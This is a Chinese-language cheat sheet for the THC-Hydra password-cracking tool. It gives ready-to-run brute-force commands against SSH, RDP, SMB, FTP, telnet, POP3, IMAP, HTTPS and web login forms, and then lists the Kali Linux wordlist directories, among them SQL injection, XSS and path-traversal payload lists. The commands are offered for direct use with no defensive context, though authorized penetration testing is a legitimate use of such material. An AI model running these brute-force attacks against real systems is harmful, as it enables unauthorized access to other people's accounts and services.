官网:http://www.thc.org/thc-hydra
https://blog.csdn.net/qq_42342141/article/details/106390594
常见使用方法
破解ssh的密码
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
破解https:
hydra -m /index.php -l username -P pass.txt IP https
破解teamspeak:
hydra -l user.txt -P password.txt -s 端口号 -vV ip teamspeak
破解smb:
hydra -l administrator -P pass.txt IP smb
破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
破解rdp:
hydra IP rdp -l administrator -P pass.txt -V
破解http-proxy:
hydra -l admin -P pass.txt http-proxy://0.0.0.0
破解telnet
hydra IP telnet -l user.txt -P password.txt -t 32 -s 23 -e ns -f -V
破解ftp:
hydra IP ftp -l user.txt -P password.txt -t 线程(默认16) -vV
hydra IP ftp -l -l user.txt -P password.txt -e ns -vV
get方式提交,破解web登录:
hydra -l user.txt -P password.txt -t 线程 -vV -e ns IP http-get /admin/
hydra -l user.txt -P password.txt -t 线程 -vV -e ns -f IP http-get /admin/index.php
post方式提交,破解web登录:
hydra -l user.txt -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
kali自带字典
路径:/usr/share/wordlists/
例如:dirb文件夹中
dirb
big.txt #大的字典
small.txt #小的字典
catala.txt #项目配置字典
common.txt #公共字典
euskera.txt #数据目录字典
extensions_common.txt #常用文件扩展名字典
indexes.txt #首页字典
mutations_common.txt #备份扩展名
spanish.txt #方法名或库目录
others #扩展目录,默认用户名等
stress #压力测试
vulns #漏洞测试
dirbuster
apache-user-enum-** #apache用户枚举
directories.jbrofuzz #目录枚举
directory-list-1.0.txt #目录列表大,中,小 big,medium,small
fern-wifi
common.txt #公共wifi账户密码
metasploit
… #各种类型的字典
webslayer
general #普通字典目录
admin-panels.txt #后台路径 字典
Injections #注入字典目录
All_attack.txt #全部***
bad_chars.txt #字符注入
SQL.txt #sql注入
Traversal.txt #路径回溯
XML.txt #xml注入
XSS.txt #xxs注入
others #扩展目录
common_pass.txt #通用密码字典
names.txt #用户名字典
stress #压力测试目录
vulns #漏洞测试目录
apache、iis、cgis...
webservicces #web服务目录
ws-dirs.txt #路径测试
ws-files.txt #文件测试